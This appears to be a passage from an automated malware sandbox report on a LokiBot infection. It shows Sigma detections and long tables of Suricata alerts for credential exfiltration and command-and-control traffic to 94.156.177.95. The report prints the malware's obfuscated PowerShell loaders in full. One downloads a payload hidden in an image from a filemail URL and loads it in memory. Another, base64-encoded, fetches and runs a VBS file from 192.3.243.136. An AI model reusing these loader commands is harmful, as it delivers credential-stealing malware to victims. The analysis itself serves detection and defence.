-CReplace([ChAr]51+[ChAr]90+[ChAr]68),[ChAr]36-CReplace ([ChAr]122+[ChAr]119+[ChAr]118),[ChAr]124))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "ieX ( (('3ZDimageUrl = Iuahttps://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmT'+'K'+'j3LC6SQtIcOc_T35w&pk_vid=fd4f614'+'bb20'+'9c62c1730'+'945176a090'+'4f Iu'+'a;3ZDwebCl'+'ient = New-Object Sys'+'tem.N'+'et.WebClient;3ZDimageBytes = 3ZDwebClient.DownloadData(3ZDimageUrl);3ZDimageText = [System.Text.Encoding]::UTF8.G'+'etString'+'(3ZDimageBytes);3ZDstartFl'+'ag = Iua<<BASE64_START>>Iua;3ZDendFlag = Iua<<BASE64_END>>Iu'+'a;3ZDstartIndex = 3ZDimage'+'Text.IndexOf(3ZDstartFlag);3ZDendIndex = 3ZDimageText.IndexOf(3ZDendFl'+'ag);3ZDstartIndex -ge 0 -and 3ZDendIndex -gt 3ZDstartIndex;3ZDstartIndex += 3ZDstartFlag.Length;3ZDbase64Length = 3Z'+'DendIndex - 3ZDstartIndex'+';3Z'+'Dbase6'+'4Command = 3ZDimageText.Substring(3ZDstartIndex, 3ZDb'+'ase64Leng'+'th);3ZDbase64Reversed = -join (3ZDbase64Command.ToCharArray() zwv ForEach-Object { 3ZD_ '+'})[-'+'1..-(3ZDbase64Command.Lengt'+'h)];3ZDcommandBytes = [System.Convert]::FromBase64String(3ZDbase64Reverse'+'d);3ZDloadedAssembly = [System.Refle'+'ction.Assembly]::Load(3ZDcommandByte'+'s);3ZDvaiMethod = [dnlib

Data Obfuscation

Sigma detected: Dot net compiler compiles file from suspicious location

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dnftngtc\dnftngtc.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dnftngtc\dnftngtc.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\sySTeM32\wIndOWSpoweRShEll\V1.0\POwERsHeLl.EXE" "pOWersHELl -EX byPass -Nop -W 1 -C DEVICecrEdEntialDEploymenT ; invoke-eXPrEssIOn($(invOKE-eXPrEsSION('[sYStem.TEXt.ENcODiNg]'+[chAR]58+[ChAR]58+'UtF8.gETstrInG([sYstem.cONVErt]'+[cHAr]58+[ChAR]0x3a+'frOMBASE64STriNg('+[ChAr]34+'JHBmWHRRICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC10eVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lbUJlcmRlRmluSVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTU9OLkRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpUa1puTFpUZ1RCLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZrLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGxEQyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSGFwT1l2aWhjLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE5qUmNkQ2pXKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiT3JjWUR2USIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZXNwQWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUEJvc0lTUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkcGZYdFE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTM2LzMzL3NlZW15YmVzdHRoaW5nc3doaWNoY2FsbHlvdWJhYnlnaXJsd2hpY2hnaXZldWhvdGNoaWNrcy50SUYiLCIkRW5WOkFQUERBVEFcc2VlbXliZXN0dGhpbmdzd2hpY2hjYWxseW91YmFieWdpcmx3aGljaGdpdmV1aC52YlMiLDAsMCk7U3RBUnQtU0xlRVAoMyk7SUVYICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlblY6QVBQREFUQVxzZWVteWJlc3R0aGluZ3N3aGljaGNhbGx5b3ViYWJ5Z2lybHdoaWNoZ2l2ZXVoLnZiUyI='+[ChaR]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6884, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dnftngtc\dnftngtc.cmdline", ProcessId: 5104, ProcessName: csc.exe

Suricata Signatures

ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-15T18:14:29.539079+0100	2024312	1	A Network Trojan was detected	192.168.2.4	49739	94.156.177.95	80	TCP
2024-11-15T18:14:30.675330+0100	2024312	1	A Network Trojan was detected	192.168.2.4	49740	94.156.177.95	80	TCP

ET MALWARE LokiBot Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-15T18:14:28.588137+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49739	94.156.177.95	80	TCP
2024-11-15T18:14:29.696597+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49740	94.156.177.95	80	TCP
2024-11-15T18:14:30.795104+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49741	94.156.177.95	80	TCP
2024-11-15T18:14:31.919895+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49742	94.156.177.95	80	TCP
2024-11-15T18:14:33.059121+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49743	94.156.177.95	80	TCP
2024-11-15T18:14:34.179211+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49744	94.156.177.95	80	TCP
2024-11-15T18:14:35.327062+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49745	94.156.177.95	80	TCP
2024-11-15T18:14:36.470587+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49746	94.156.177.95	80	TCP
2024-11-15T18:14:37.613187+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49747	94.156.177.95	80	TCP
2024-11-15T18:14:38.767433+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49748	94.156.177.95	80	TCP
2024-11-15T18:14:39.915789+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49749	94.156.177.95	80	TCP
2024-11-15T18:14:41.021819+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49750	94.156.177.95	80	TCP
2024-11-15T18:14:42.169695+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49751	94.156.177.95	80	TCP
2024-11-15T18:14:43.295006+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49752	94.156.177.95	80	TCP
2024-11-15T18:14:44.446888+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49753	94.156.177.95	80	TCP
2024-11-15T18:14:45.590810+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49754	94.156.177.95	80	TCP
2024-11-15T18:14:46.714498+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49755	94.156.177.95	80	TCP
2024-11-15T18:14:47.882051+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49756	94.156.177.95	80	TCP
2024-11-15T18:14:49.034112+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49757	94.156.177.95	80	TCP
2024-11-15T18:14:50.182971+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49758	94.156.177.95	80	TCP
2024-11-15T18:14:51.319509+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49759	94.156.177.95	80	TCP
2024-11-15T18:14:52.454053+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49760	94.156.177.95	80	TCP
2024-11-15T18:14:53.594421+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49761	94.156.177.95	80	TCP
2024-11-15T18:14:54.694505+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49762	94.156.177.95	80	TCP
2024-11-15T18:14:56.897576+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49763	94.156.177.95	80	TCP
2024-11-15T18:14:58.049519+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49765	94.156.177.95	80	TCP
2024-11-15T18:14:59.161814+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49767	94.156.177.95	80	TCP
2024-11-15T18:15:00.310997+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49773	94.156.177.95	80	TCP
2024-11-15T18:15:01.433270+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49779	94.156.177.95	80	TCP
2024-11-15T18:15:02.774194+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49785	94.156.177.95	80	TCP
2024-11-15T18:15:03.942454+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49795	94.156.177.95	80	TCP
2024-11-15T18:15:05.073942+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49802	94.156.177.95	80	TCP
2024-11-15T18:15:06.199202+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49808	94.156.177.95	80	TCP
2024-11-15T18:15:07.370279+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49813	94.156.177.95	80	TCP
2024-11-15T18:15:08.480132+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49818	94.156.177.95	80	TCP
2024-11-15T18:15:09.759213+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49825	94.156.177.95	80	TCP
2024-11-15T18:15:10.869167+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49832	94.156.177.95	80	TCP
2024-11-15T18:15:12.002434+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49836	94.156.177.95	80	TCP
2024-11-15T18:15:13.104632+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49841	94.156.177.95	80	TCP
2024-11-15T18:15:14.236003+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49849	94.156.177.95	80	TCP
2024-11-15T18:15:15.349391+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49855	94.156.177.95	80	TCP
2024-11-15T18:15:16.433713+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49860	94.156.177.95	80	TCP
2024-11-15T18:15:17.538066+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49865	94.156.177.95	80	TCP
2024-11-15T18:15:18.633126+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49869	94.156.177.95	80	TCP
2024-11-15T18:15:19.765315+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49875	94.156.177.95	80	TCP
2024-11-15T18:15:20.938967+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49879	94.156.177.95	80	TCP
2024-11-15T18:15:22.075165+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49884	94.156.177.95	80	TCP
2024-11-15T18:15:23.183308+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49888	94.156.177.95	80	TCP
2024-11-15T18:15:24.806146+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49895	94.156.177.95	80	TCP
2024-11-15T18:15:26.050868+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49900	94.156.177.95	80	TCP
2024-11-15T18:15:27.207351+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49905	94.156.177.95	80	TCP
2024-11-15T18:15:28.328661+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49911	94.156.177.95	80	TCP
2024-11-15T18:15:29.444036+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49918	94.156.177.95	80	TCP
2024-11-15T18:15:30.558346+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49923	94.156.177.95	80	TCP
2024-11-15T18:15:32.185276+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49932	94.156.177.95	80	TCP
2024-11-15T18:15:33.342990+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49936	94.156.177.95	80	TCP
2024-11-15T18:15:34.461022+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49942	94.156.177.95	80	TCP
2024-11-15T18:15:35.606842+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49949	94.156.177.95	80	TCP
2024-11-15T18:15:36.942827+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49956	94.156.177.95	80	TCP
2024-11-15T18:15:38.040556+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49965	94.156.177.95	80	TCP
2024-11-15T18:15:39.160355+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49971	94.156.177.95	80	TCP
2024-11-15T18:15:40.257744+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49978	94.156.177.95	80	TCP
2024-11-15T18:15:41.402378+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49985	94.156.177.95	80	TCP
2024-11-15T18:15:42.524040+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49991	94.156.177.95	80	TCP
2024-11-15T18:15:43.648109+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49998	94.156.177.95	80	TCP
2024-11-15T18:15:44.761342+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	50003	94.156.177.95	80	TCP
2024-11-15T18:15:45.883899+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	50010	94.156.177.95	80	TCP
2024-11-15T18:15:47.367955+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	50016	94.156.177.95	80	TCP
2024-11-15T18:15:48.523172+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	50021	94.156.177.95	80	TCP
2024-11-15T18:15:49.631500+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	50026	94.156.177.95	80	TCP
2024-11-15T18:15:51.452174+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	50030	94.156.177.95	80	TCP
2024-11-15T18:15:52.550655+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	50039	94.156.177.95	80	TCP
2024-11-15T18:15:53.681411+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	50044	94.156.177.95	80	TCP
2024-11-15T18:15:54.778594+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	50049	94.156.177.95	80	TCP
2024-11-15T18:15:55.941777+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	50054	94.156.177.95	80	TCP
2024-11-15T18:15:57.034588+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	50063	94.156.177.95	80	TCP
2024-11-15T18:15:58.148280+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	50068	94.156.177.95	80	TCP
2024-11-15T18:15:59.321996+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	50073	94.156.177.95	80	TCP
2024-11-15T18:16:00.432593+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	50080	94.156.177.95	80	TCP
2024-11-15T18:16:01.549900+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	50084	94.156.177.95	80	TCP

ET MALWARE LokiBot Fake 404 Response

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-15T18:14:31.762597+0100	2025483	1	A Network Trojan was detected	94.156.177.95	80	192.168.2.4	49741	TCP
2024-11-15T18:14:32.896680+0100	2025483	1	A Network Trojan was detected	94.156.177.95	80	192.168.2.4	49742	TCP
2024-11-15T18:14:34.039378+0100	2025483	1	A Network Trojan was detected	94.156.177.95	80	192.168.2.4	49743	TCP
2024-11-15T18:14:35.164579+0100	2025483	1	A Network Trojan was detected	94.156.177.95	80	192.168.2.4	49744	TCP
2024-11-15T18:14:36.290489+0100	2025483	1	A Network Trojan was detected	94.156.177.95	80	192.168.2.4	49745	TCP
2024-11-15T18:14:37.448794+0100	2025483	1	A Network Trojan was detected	94.156.177.95	80	192.168.2.4	49746	TCP
2024-11-15T18:14:38.608490+0100	2025483	1	A Network Trojan was detected	94.156.177.95	80	192.168.2.4	49747	TCP
2024-11-15T18:14:39.766951+0100	2025483	1	A Network Trojan was detected	94.156.177.95	80	192.168.2.4	49748	TCP
2024-11-15T18:14:40.872268+0100	2025483	1	A Network Trojan was detected	94.156.177.95	80	192.168.2.4	49749	TCP
2024-11-15T18:14:42.021787+0100	2025483	1	A Network Trojan was detected	94.156.177.95	80	192.168.2.4	49750	TCP
2024-11-15T18:14:43.124310+0100	2025483	1	A Network Trojan was detected	94.156.177.95	80	192.168.2.4	49751	TCP
2024-11-15T18:14:44.294140+0100	2025483	1	A Network Trojan was detected	94.156.177.95	80	192.168.2.4	49752	TCP
2024-11-15T18:14:45.441546+0100	2025483	1	A Network Trojan was detected	94.156.177.95	80	192.168.2.4	49753	TCP
2024-11-15T18:14:46.568842+0100	2025483	1	A Network Trojan was detected	94.156.177.95	80	192.168.2.4	49754	TCP
2024-11-15T18:14:47.666396+0100	2025483	1	A Network Trojan was detected	94.156.177.95	80	192.168.2.4	49755	TCP
2024-11-15T18:14:48.868839+0100	2025483	1	A Network Trojan was detected	94.156.177.95	80	192.168.2.4	49756	TCP
2024-11-15T18:14:49.980312+0100	2025483	1	A Network Trojan was detected	94.156.177.95	80	192.168.2.4	49757	TCP
2024-11-15T18:14:51.176298+0100	2025483	1	A Network Trojan was detected	94.156.177.95	80	192.168.2.4	49758	TCP
2024-11-15T18:14:52.296733+0100	2025483	1	A Network Trojan was detected	94.156.177.95	80	192.168.2.4	49759	TCP
2024-11-15T18:14:53.441225+0100	2025483	1	A Network Trojan was detected	94.156.177.95	80	192.168.2.4	49760	TCP
2024-11-15T18:14:54.538826+0100	2025483	1	A Network Trojan was detected	94.156.177.95	80	192.168.2.4	49761	TCP
2024-11-15T18:14:56.701607+0100	2025483	1	A Network Trojan was detected	94.156.177.95	80	192.168.2.4	49762	TCP
2024-11-15T18:14:57.896447+0100	2025483	1	A Network Trojan was detected	94.156.177.95	80	192.168.2.4	49763	TCP
2024-11-15T18:14:59.001252+0100	2025483	1	A Network Trojan was detected	94.156.177.95	80	192.168.2.4	49765	TCP
2024-11-15T18:15:00.112387+0100	2025483	1	A Network Trojan was detected	94.156.177.95	80	192.168.2.4	49767	TCP
2024-11-15T18:15:01.280238+0100	2025483	1	A Network Trojan was detected	94.156.177.95	80	192.168.2.4	49773	TCP
2024-11-15T18:15:02.623583+0100	2025483	1	A Network Trojan was detected	94.156.177.95	80	192.168.2.4	49779	TCP
2024-11-15T18:15:03.765726+0100	2025483	1	A Network Trojan was detected	94.156.177.95	80	192.168.2.4	49785	TCP
2024-11-15T18:15:04.930007+0100	2025483	1	A Network Trojan was detected	94.156.177.95	80	192.168.2.4	49795	TCP
2024-11-15T18:15:06.039433+0100	2025483	1	A Network Trojan was detected	94.156.177.95	80	192.168.2.4	49802	TCP
2024-11-15T18:15:07.188929+0100	2025483	1	A Network Trojan was detected	94.156.177.95	80	192.168.2.4	49808	TCP
2024-11-15T18:15:08.333135+0100	2025483	1	A Network Trojan was detected	94.156.177.95	80	192.168.2.4	49813	TCP
2024-11-15T18:15:09.449703+0100	2025483	1	A Network Trojan was detected	94.156.177.95	80	192.168.2.4	49818	TCP
2024-11-15T18:15:10.720089+0100	2025483	1	A Network Trojan was detected	94.156.177.95	80	192.168.2.4	49825	TCP
2024-11-15T18:15:11.845061+0100	2025483	1	A Network Trojan was detected	94.156.177.95	80	192.168.2.4	49832	TCP
2024-11-15T18:15:12.953797+0100	2025483	1	A Network Trojan was detected	94.156.177.95	80	192.168.2.4	49836	TCP
2024-11-15T18:15:14.085123+0100	2025483	1	A Network Trojan was detected	94.156.177.95	80	192.168.2.4	49841	TCP
2024-11-15T18:15:15.188874+0100	2025483	1	A Network Trojan was detected	94.156.177.95	80	192.168.2.4	49849	TCP
2024-11-15T18:15:16.288998+0100	2025483	1	A Network Trojan was detected	94.156.177.95	80	192.168.2.4	49855	TCP
2024-11-15T18:15:17.368827+0100	2025483	1	A Network Trojan was detected	94.156.177.95	80	192.168.2.4	49860	TCP
2024-11-15T18:15:18.474007+0100	2025483	1	A Network Trojan was detected	94.156.177.95	80	192.168.2.4	49865	TCP
2024-11-15T18:15:19.612495+0100	2025483	1	A Network Trojan was detected	94.156.177.95	80	192.168.2.4	49869	TCP
2024-11-15T18:15:20.775939+0100	2025483	1	A Network Trojan was detected	94.156.177.95	80	192.168.2.4	49875	TCP
2024-11-15T18:15:21.920075+0100	2025483	1	A Network Trojan was detected	94.156.177.95	80	192.168.2.4	49879	TCP
2024-11-15T18:15:23.035295+0100	2025483	1	A Network Trojan was detected	94.156.177.95	80	192.168.2.4	49884	TCP
2024-11-15T18:15:24.556825+0100	2025483	1	A Network Trojan was detected	94.156.177.95	80	192.168.2.4	49888	TCP
2024-11-15T18:15:25.767137+0100	2025483	1	A Network Trojan was detected	94.156.177.95	80	192.168.2.4	49895	TCP
2024-11-15T18:15:27.034568+0100	2025483	1	A Network Trojan was detected	94.156.177.95	80	192.168.2.4	49900	TCP
2024-11-15T18:15:28.166501+0100	2025483	1	A Network Trojan was detected	94.156.177.95	80	192.168.2.4	49905	TCP
2024-11-15T18:15:29.278462+0100	2025483	1	A Network Trojan was detected	94.156.177.95	80	192.168.2.4	49911	TCP
2024-11-15T18:15:30.406277+0100	2025483	1	A Network Trojan was detected	94.156.177.95	80	192.168.2.4	49918	TCP
2024-11-15T18:15:32.033879+0100	2025483	1	A Network Trojan was detected	94.156.177.95	80	192.168.2.4	49923	TCP
2024-11-15T18:15:33.192062+0100	2025483	1	A Network Trojan was detected	94.156.177.95	80	192.168.2.4	49932	TCP
2024-11-15T18:15:34.318229+0100	2025483	1	A Network Trojan was detected	94.156.177.95	80	192.168.2.4	49936	TCP
2024-11-15T18:15:35.460048+0100	2025483	1	A Network Trojan was detected	94.156.177.95	80	192.168.2.4	49942	TCP
2024-11-15T18:15:36.562590+0100	2025483	1	A Network Trojan was detected	94.156.177.95	80	192.168.2.4	49949	TCP
2024-11-15T18:15:37.899107+0100	2025483	1	A Network Trojan was detected	94.156.177.95	80	192.168.2.4	49956	TCP
2024-11-15T18:15:39.007797+0100	2025483	1	A Network Trojan was detected	94.156.177.95	80	192.168.2.4	49965	TCP
2024-11-15T18:15:40.101074+0100	2025483	1	A Network Trojan was detected	94.156.177.95	80	192.168.2.4	49971	TCP
2024-11-15T18:15:41.252279+0100	2025483	1	A Network Trojan was detected	94.156.177.95	80	192.168.2.4	49978	TCP
2024-11-15T18:15:42.363349+0100	2025483	1	A Network Trojan was detected	94.156.177.95	80	192.168.2.4	49985	TCP
2024-11-15T18:15:43.501298+0100	2025483	1	A Network Trojan was detected	94.156.177.95	80	192.168.2.4	49991	TCP
2024-11-15T18:15:44.614598+0100	2025483	1	A Network Trojan was detected	94.156.177.95	80	192.168.2.4	49998	TCP
2024-11-15T18:15:45.725988+0100	2025483	1	A Network Trojan was detected	94.156.177.95	80	192.168.2.4	50003	TCP
2024-11-15T18:15:47.228182+0100	2025483	1	A Network Trojan was detected	94.156.177.95	80	192.168.2.4	50010	TCP
2024-11-15T18:15:48.325705+0100	2025483	1	A Network Trojan was detected	94.156.177.95	80	192.168.2.4	50016	TCP
2024-11-15T18:15:49.489769+0100	2025483	1	A Network Trojan was detected	94.156.177.95	80	192.168.2.4	50021	TCP
2024-11-15T18:15:51.299652+0100	2025483	1	A Network Trojan was detected	94.156.177.95	80	192.168.2.4	50026	TCP
2024-11-15T18:15:52.395416+0100	2025483	1	A Network Trojan was detected	94.156.177.95	80	192.168.2.4	50030	TCP
2024-11-15T18:15:53.536574+0100	2025483	1	A Network Trojan was detected	94.156.177.95	80	192.168.2.4	50039	TCP
2024-11-15T18:15:54.626383+0100	2025483	1	A Network Trojan was detected	94.156.177.95	80	192.168.2.4	50044	TCP
2024-11-15T18:15:55.785103+0100	2025483	1	A Network Trojan was detected	94.156.177.95	80	192.168.2.4	50049	TCP
2024-11-15T18:15:56.875613+0100	2025483	1	A Network Trojan was detected	94.156.177.95	80	192.168.2.4	50054	TCP
2024-11-15T18:15:58.012601+0100	2025483	1	A Network Trojan was detected	94.156.177.95	80	192.168.2.4	50063	TCP
2024-11-15T18:15:59.152769+0100	2025483	1	A Network Trojan was detected	94.156.177.95	80	192.168.2.4	50068	TCP
2024-11-15T18:16:00.275401+0100	2025483	1	A Network Trojan was detected	94.156.177.95	80	192.168.2.4	50073	TCP
2024-11-15T18:16:01.388476+0100	2025483	1	A Network Trojan was detected	94.156.177.95	80	192.168.2.4	50080	TCP
2024-11-15T18:16:02.503491+0100	2025483	1	A Network Trojan was detected	94.156.177.95	80	192.168.2.4	50084	TCP

ET MALWARE LokiBot Request for C2 Commands Detected M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-15T18:14:31.757247+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49741	94.156.177.95	80	TCP
2024-11-15T18:14:32.891366+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49742	94.156.177.95	80	TCP
2024-11-15T18:14:34.034011+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49743	94.156.177.95	80	TCP
2024-11-15T18:14:35.159054+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49744	94.156.177.95	80	TCP
2024-11-15T18:14:36.284393+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49745	94.156.177.95	80	TCP
2024-11-15T18:14:37.443015+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49746	94.156.177.95	80	TCP
2024-11-15T18:14:38.600814+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49747	94.156.177.95	80	TCP
2024-11-15T18:14:39.761618+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49748	94.156.177.95	80	TCP
2024-11-15T18:14:40.866807+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49749	94.156.177.95	80	TCP
2024-11-15T18:14:42.016291+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49750	94.156.177.95	80	TCP
2024-11-15T18:14:43.119045+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49751	94.156.177.95	80	TCP
2024-11-15T18:14:44.288553+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49752	94.156.177.95	80	TCP
2024-11-15T18:14:45.436270+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49753	94.156.177.95	80	TCP
2024-11-15T18:14:46.563404+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49754	94.156.177.95	80	TCP
2024-11-15T18:14:47.661088+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49755	94.156.177.95	80	TCP
2024-11-15T18:14:48.863645+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49756	94.156.177.95	80	TCP
2024-11-15T18:14:49.974935+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49757	94.156.177.95	80	TCP
2024-11-15T18:14:51.170948+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49758	94.156.177.95	80	TCP
2024-11-15T18:14:52.291246+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49759	94.156.177.95	80	TCP
2024-11-15T18:14:53.435601+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49760	94.156.177.95	80	TCP
2024-11-15T18:14:54.533464+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49761	94.156.177.95	80	TCP
2024-11-15T18:14:56.696356+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49762	94.156.177.95	80	TCP
2024-11-15T18:14:57.891299+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49763	94.156.177.95	80	TCP
2024-11-15T18:14:58.995981+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49765	94.156.177.95	80	TCP
2024-11-15T18:15:00.107047+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49767	94.156.177.95	80	TCP
2024-11-15T18:15:01.275023+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49773	94.156.177.95	80	TCP
